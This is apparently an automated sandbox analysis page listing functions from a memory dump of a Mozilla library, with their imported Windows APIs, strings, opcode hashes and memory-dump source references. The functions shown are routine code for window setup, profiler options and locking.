Instruction ID: 847e3582a78b901618d98ce7101b713317aa8019d6372db2b3185b55660006ee
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: ABB1E572F0420A8BCB14CE58CC816EDB7B2EF85314F14426AC949DB795D734A989CB95

Function 6C65BEF0 Relevance: 8.2, APIs: 5, Instructions: 652COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C65C1CB
__aulldiv.LIBCMT ref: 6C65C24C
__aulldiv.LIBCMT ref: 6C65C348
__aullrem.LIBCMT ref: 6C65C365
__aulldiv.LIBCMT ref: 6C65C37D

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: __aulldiv$__aullrem
String ID:
API String ID: 2022606265-0
Opcode ID: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
Instruction ID: ca4ed2d6a03da8a3f704beac6cc95ae7f98496a33d9bce822fe9f562690d7ed6
Opcode Fuzzy Hash: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
Instruction Fuzzy Hash: 18323632B046119FC718DE2CC89065ABBE6AFC9310F59866DE896CB395D730ED15CB90

Function 6C696CF0 Relevance: 4.7, APIs: 3, Instructions: 231COMMON

Download Yara Rule

APIs

InitializeConditionVariable.KERNEL32(?), ref: 6C696D45
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C696E1E

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ConditionExclusiveInitializeLockReleaseVariable
String ID:
API String ID: 4169067295-0
Opcode ID: ba068df2cbb1ff551d94e21bc760f8014598e75bcf2a8839709e9f76211d8ed1
Instruction ID: cef72b3a95c0d67210e09b72d9d8342b2118f061bfe39851605f90312853d60d
Opcode Fuzzy Hash: ba068df2cbb1ff551d94e21bc760f8014598e75bcf2a8839709e9f76211d8ed1
Instruction Fuzzy Hash: 2BA17E706183818FC755CF25C490BAEFBE2BF89308F44495DE48A87751DB70E949CB96

Function 6C674640 Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 1251memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 6C674777

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6C675585, 6C6755A8, 6C6755C3, 6C675624

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: MOZ_RELEASE_ASSERT(mNode)
API String ID: 4275171209-1351931279
Opcode ID: 4792eabb66932662e5599aae4cedfd217326090fa2d9b3d2c5bb024516887474
Instruction ID: e152d09da89ed65f54dddbc3e1f9f5dc8f98e24aebc063a76cc89704db909104
Opcode Fuzzy Hash: 4792eabb66932662e5599aae4cedfd217326090fa2d9b3d2c5bb024516887474
Instruction Fuzzy Hash: 58B2DE71A057018FD328CF18C584725FBE2BFC5324B29CBADE4698B6A5D771E841CB98

Function 6C6B85F0 Relevance: 3.6, APIs: 2, Instructions: 619COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C6B8C7C
__aulldiv.LIBCMT ref: 6C6B8DD7

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: __aulldiv
String ID:
API String ID: 3732870572-0
Opcode ID: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction ID: 814de8cf06003e87ebb2477e944c0d94209f8b6e29ef4fbe5db3ef8435c7af2b
Opcode Fuzzy Hash: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction Fuzzy Hash: D5328F71F0011A8BDF18CE9CC8A17AEB7B2FB8C304F15853AD506BB7A0DA349D558B95

Function 6C6C76E3 Relevance: 1.8, Strings: 1, Instructions: 540COMMON

Download Yara Rule

Strings

~qel, xrefs: 6C6C7E0B, 6C6C7B0B, 6C6C793C, 6C6C79C0, 6C6C7796, 6C6C79FB

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID:
String ID: ~qel
API String ID: 0-2736371781
Opcode ID: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
Instruction ID: c3f351375ce2f0f9a3e522e778f1118c83f9cb449e28e628ffd06b8ba48e099a
Opcode Fuzzy Hash: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
Instruction Fuzzy Hash: AF320971E006198FCB14CF98C890AADFBF2FF88308F54816AC559A7745D731A986CF95

Function 6C6C6E63 Relevance: 1.7, Strings: 1, Instructions: 498COMMON

Download Yara Rule

Strings

~qel, xrefs: 6C6C7E0B, 6C6C7B0B, 6C6C793C, 6C6C79C0, 6C6C7C72, 6C6C7C03, 6C6C79FB

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID:
String ID: ~qel
API String ID: 0-2736371781
Opcode ID: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
Instruction ID: 3be4a28f322a9970853bb3041ef7813f79d8eca11099a4da24d4568498a361c3
Opcode Fuzzy Hash: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
Instruction Fuzzy Hash: F822E771E006198FCB14CF98C880AADF7F2FF89304F6485AAC949A7745D731A986CF95

Function 6C695C10 Relevance: 1.6, APIs: 1, Instructions: 333COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,?,6C664A63,?,?), ref: 6C695F06

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 1913865122f404812779f936fc1b3168496d64710720d4fcf55dc420e8726b74
Instruction ID: 4e78ddb84189f0b869c18d016eff578674f1ff09ffa21a39c9186e2f069ba6a1
Opcode Fuzzy Hash: 1913865122f404812779f936fc1b3168496d64710720d4fcf55dc420e8726b74
Instruction Fuzzy Hash: 5FC1C275D0120A8BCB04CFA5D5906EEBBF2FF8A319F28425DD8556BB44D732A806CF94

Function 6C680512 Relevance: .5, Instructions: 466COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
Instruction ID: 3e2dc702d0882207978e665154e5a8ef5aaab46da424cb116f28f689c6641572
Opcode Fuzzy Hash: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
Instruction Fuzzy Hash: 72223771E05619CFCB24CF98C890AADF7B2FF89308F548699C54AA7705D730A986CF94

Function 6C6CAC00 Relevance: .4, Instructions: 445COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32b0648d1147d7e88448044eaa04edfa097c69572b65d1b73d01dcb8599e7971
Instruction ID: c26b37ba736ff65f4445e7514a68d184ead88ba06c877f9f6937d7afe7b65eb5
Opcode Fuzzy Hash: 32b0648d1147d7e88448044eaa04edfa097c69572b65d1b73d01dcb8599e7971
Instruction Fuzzy Hash: 8DF13971B087454FD700CE28C8917AAB7E2EFC6318F148A2DE5E487792E774D8898797

Function 6C65C670 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
Instruction ID: 47d4b005ea0d460a9a087beec7120d377fd57c6bf0f934b183e120b1cd954d5e
Opcode Fuzzy Hash: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
Instruction Fuzzy Hash: 16A1AF71F0021A9FDB08CE68C8913AEB7F2AFC9354F588129D916E7781DB349D168B90

Function 6C6B55F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32,?,6C68E1A5), ref: 6C6B5606
LoadLibraryW.KERNEL32(gdi32,?,6C68E1A5), ref: 6C6B560F
GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C6B5633
GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C6B563D
GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C6B566C
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C6B567D
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C6B5696
GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C6B56B2
GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C6B56CB
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C6B56E4
GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C6B56FD
GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C6B5716
GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C6B572F
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C6B5748
GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C6B5761
GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C6B577A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C6B5793
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C6B57A8
GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C6B57BD
GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C6B57D5
GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C6B57EA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C6B57FF

Strings

GetDpiForWindow, xrefs: 6C6B5690
DeleteObject, xrefs: 6C6B57F9
GetSystemMetricsForDpi, xrefs: 6C6B5677
FillRect, xrefs: 6C6B5729
GetWindowDC, xrefs: 6C6B5710
AreDpiAwarenessContextsEqual, xrefs: 6C6B5637
ShowWindow, xrefs: 6C6B56DE
GetMonitorInfoW, xrefs: 6C6B57A2
SetWindowLongPtrW, xrefs: 6C6B57B7
MonitorFromWindow, xrefs: 6C6B578D
LoadCursorW, xrefs: 6C6B5774
EnableNonClientDpiScaling, xrefs: 6C6B5666
GetThreadDpiAwarenessContext, xrefs: 6C6B562D
user32, xrefs: 6C6B5601
gdi32, xrefs: 6C6B560A
CreateWindowExW, xrefs: 6C6B56C5
ReleaseDC, xrefs: 6C6B5742
StretchDIBits, xrefs: 6C6B57CC
LoadIconW, xrefs: 6C6B575B
RegisterClassW, xrefs: 6C6B56AC
SetWindowPos, xrefs: 6C6B56F7
CreateSolidBrush, xrefs: 6C6B57E4

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
API String ID: 2238633743-1964193996
Opcode ID: 94b76636f99ffd07114a4f151aec59dcb6d2598d60fa7d4b3905766af542c8f8
Instruction ID: b3b9cb022db72f0e9f9477c7989f80cbda05744432ed32d297e3daa30a732aad
Opcode Fuzzy Hash: 94b76636f99ffd07114a4f151aec59dcb6d2598d60fa7d4b3905766af542c8f8
Instruction Fuzzy Hash: 965169707113235BDB009F36CD84A663AF8AB4A785F114925AA21F3A55EFB0F811CF6D

Function 6C69CC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C66582D), ref: 6C69CC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C66582D), ref: 6C69CC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C6CFE98,?,?,?,?,?,6C66582D), ref: 6C69CC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C66582D), ref: 6C69CC6C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C66582D), ref: 6C69CC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C66582D), ref: 6C69CC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C66582D), ref: 6C69CCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C69CCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C69CCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C69CCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C69CCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C69CD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C69CD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C69CD98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C69CDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C69CDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C69CDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C69CDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C69CE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C69CE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C69CE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C69CE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C69CE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C69CE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C69CE8A

Strings

leaf, xrefs: 6C69CC66
fileioall, xrefs: 6C69CCA8
nativeallocations, xrefs: 6C69CDA8
mainthreadio, xrefs: 6C69CC7C
processcpu, xrefs: 6C69CE6E
samplingallthreads, xrefs: 6C69CE2C
stackwalk, xrefs: 6C69CCF8
jsallocations, xrefs: 6C69CD0E
seqstyle, xrefs: 6C69CCE6
fileio, xrefs: 6C69CC92
nostacksampling, xrefs: 6C69CD7C
screenshots, xrefs: 6C69CCD4
default, xrefs: 6C69CC21
preferencereads, xrefs: 6C69CD92
power, xrefs: 6C69CE84
cpuallthreads, xrefs: 6C69CE16
ipcmessages, xrefs: 6C69CDBE
unregisteredthreads, xrefs: 6C69CE58
java, xrefs: 6C69CC37
Unrecognized feature "%s"., xrefs: 6C69CEA0
markersallthreads, xrefs: 6C69CE42
notimerresolutionchange, xrefs: 6C69CE00
audiocallbacktracing, xrefs: 6C69CDD4
noiostacks, xrefs: 6C69CCBE

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 1004003707-2809817890
Opcode ID: 602cefd0f958e7c68f7242adeed9a91ecb3ecbc503f71a6bb229bb2c15ae9e18
Instruction ID: 86e23dd8be6c638818287a695d03abbef18e979f159a2decd0edf4e43f665e4b
Opcode Fuzzy Hash: 602cefd0f958e7c68f7242adeed9a91ecb3ecbc503f71a6bb229bb2c15ae9e18
Instruction Fuzzy Hash: D05142D1B4562772FA0531156D20BEA1485EF5334AF14443AEE1BA2E90FB05E70FCAAF

Function 6C664470 Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C664730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C6644B2,6C6DE21C,6C6DF7F8), ref: 6C66473E
Part of subcall function 6C664730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C66474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C6644BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C6644D2
InitOnceExecuteOnce.KERNEL32(6C6DF80C,6C65F240,?,?), ref: 6C66451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C66455C
LoadLibraryW.KERNEL32(?), ref: 6C664592
InitializeCriticalSection.KERNEL32(6C6DF770), ref: 6C6645A2
moz_xmalloc.MOZGLUE(00000008), ref: 6C6645AA
moz_xmalloc.MOZGLUE(00000018), ref: 6C6645BB
InitOnceExecuteOnce.KERNEL32(6C6DF818,6C65F240,?,?), ref: 6C664612
?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C664636
LoadLibraryW.KERNEL32(user32.dll), ref: 6C664644
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C66466D
VerSetConditionMask.NTDLL ref: 6C66469F
VerSetConditionMask.NTDLL ref: 6C6646AB
VerSetConditionMask.NTDLL ref: 6C6646B2
VerSetConditionMask.NTDLL ref: 6C6646B9
VerSetConditionMask.NTDLL ref: 6C6646C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C6646CD
GetModuleHandleW.KERNEL32(00000000), ref: 6C6646F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C6646FD

Strings

l, xrefs: 6C664578
WRusr.dll, xrefs: 6C6644B5
user32.dll, xrefs: 6C664557, 6C66463F
kernel32.dll, xrefs: 6C6644CD
Gml, xrefs: 6C6644FC
NativeNtBlockSet_Write, xrefs: 6C6646F7

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
String ID: Gml$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 1702738223-884719140
Opcode ID: 7f36ea0ce7a6cd817d4207c682ef3097cf320b583f35835c022c5327a6ca0a1b
Instruction ID: eab5048da82757be091df25168019b24db7482201df077dfba6ea1edc53506d4
Opcode Fuzzy Hash: 7f36ea0ce7a6cd817d4207c682ef3097cf320b583f35835c022c5327a6ca0a1b
Instruction Fuzzy Hash: AE6106B0604244AFEB00DF63D895BA57BB8EF86348F04C458E5049BA41D7F1AA85CF9F

Function 6C69F6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
Part of subcall function 6C699420: __Init_thread_footer.LIBCMT ref: 6C69949F

GetCurrentThreadId.KERNEL32 ref: 6C69F70E
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C69F8F9

Part of subcall function 6C666390: GetCurrentThreadId.KERNEL32 ref: 6C6663D0
Part of subcall function 6C666390: AcquireSRWLockExclusive.KERNEL32 ref: 6C6663DF
Part of subcall function 6C666390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C66640E

ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69F93A
GetCurrentThreadId.KERNEL32 ref: 6C69F98A
GetCurrentThreadId.KERNEL32 ref: 6C69F990
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C69F994
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C69F716

Part of subcall function 6C6994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6994EE
Part of subcall function 6C6994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C699508

Part of subcall function 6C65B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C65B5E0

GetCurrentThreadId.KERNEL32 ref: 6C69F739
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69F746
GetCurrentThreadId.KERNEL32 ref: 6C69F793
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C6D385B,00000002,?,?,?,?,?), ref: 6C69F829
free.MOZGLUE(?,?,00000000,?), ref: 6C69F84C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C69F866
free.MOZGLUE(?), ref: 6C69FA0C

Part of subcall function 6C665E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6655E1), ref: 6C665E8C
